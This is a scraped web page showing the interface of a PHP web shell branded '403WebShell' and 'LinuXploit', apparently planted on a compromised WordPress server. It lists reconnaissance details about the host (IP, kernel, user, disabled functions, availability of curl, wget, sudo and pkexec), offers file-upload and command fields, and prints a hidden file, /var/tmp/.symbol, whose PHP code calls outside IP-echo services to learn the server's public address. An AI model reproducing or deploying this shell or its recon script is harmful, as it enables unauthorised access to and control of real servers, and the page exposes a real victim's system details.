Warning: include_once(/home/freelife/public_html/wp-content/plugins/wp-super-cache/wp-cache-phase1.php): failed to open stream: No such file or directory in /home/freelife/public_html/wp-content/advanced-cache.php on line 22

Warning: include_once(): Failed opening '/home/freelife/public_html/wp-content/plugins/wp-super-cache/wp-cache-phase1.php' for inclusion (include_path='.:') in /home/freelife/public_html/wp-content/advanced-cache.php on line 22
403WebShell
403Webshell
Server IP : 176.9.105.210  /  Your IP : 216.73.217.21
Web Server : Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
System : Linux server.mediaphic.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : freelife ( 1356)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system,show_source,mail,sendmail,popen,symlink,phpinfo
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/tmp/.symbol
<?php   $a = array('http://ipecho.net/plain', 'https://api.ipify.org/', 'http://checkip.dyndns.com/'); foreach ($a as $u) {     $p = get($u);     if (preg_match('/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/', $p, $m)) {        die("<ip>{$m[0]}</ip>");     } }  function get($url) {     if (function_exists('curl_init')) {         $ch = curl_init($url);         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);         curl_setopt($ch, CURLOPT_TIMEOUT, 15);         curl_setopt($ch, CURLOPT_HEADER, 0);         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);         curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36');         $data = curl_exec($ch);         curl_close($ch);         return $data;     } elseif (@ini_get('allow_url_fopen')) {         return @file_get_contents($url);     } else {         $parts = parse_url($url);         $target = $parts['host'];         $port = isset($parts['port']) ? $parts['port'] : 80;         $page = isset($parts['path']) ? $parts['path'] : '';         $page .= isset($parts['query']) ? '?' . $parts['query'] : '';         $page .= isset($parts['fragment']) ? '#' . $parts['fragment'] : '';         $page = ($page == '') ? '/' : $page;         if ($fp = @fsockopen($target, $port, $errno, $errstr, 3)) {             @socket_set_option($fp, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 1, "usec" => 1));             $headers = "GET $page HTTP/1.1\r\n";             $headers .= "Host: {$parts['host']}\r\n";             $headers .= "Connection: Close\r\n\r\n";             if (fwrite($fp, $headers)) {                 $resp = '';                 while (!feof($fp) && ($curr = fgets($fp, 128)) !== false) {                     $resp .= $curr;                 }                 if (isset($curr) && $curr !== false) {                     fclose($fp);                     return substr(strstr($resp, "\r\n\r\n"), 3);                 }             }             fclose($fp);         }     }     return TRUE; } 

Youez - 2016 - github.com/yon3zu
LinuXploit